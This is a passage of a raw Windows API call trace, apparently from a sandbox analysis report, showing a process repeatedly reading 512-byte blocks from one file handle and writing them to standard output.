dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.979] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, 
lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] GetFileType (hFile=0x50) returned 0x1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.980] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.980] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.980] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] GetFileType (hFile=0x50) returned 0x1 [0132.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.981] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.981] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.982] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] GetFileType (hFile=0x50) returned 0x1 [0132.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.982] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.982] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.983] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: 
lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] GetFileType (hFile=0x50) returned 0x1 [0132.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.983] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.984] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.984] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.984] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] GetFileType (hFile=0x50) returned 0x1 [0132.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.984] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.985] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.985] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] GetFileType (hFile=0x50) returned 0x1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.985] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 
[0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0132.986] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.986] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] GetFileType (hFile=0x50) returned 0x1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.986] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.987] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.987] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType 
(hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] GetFileType (hFile=0x50) returned 0x1 [0132.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.987] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType 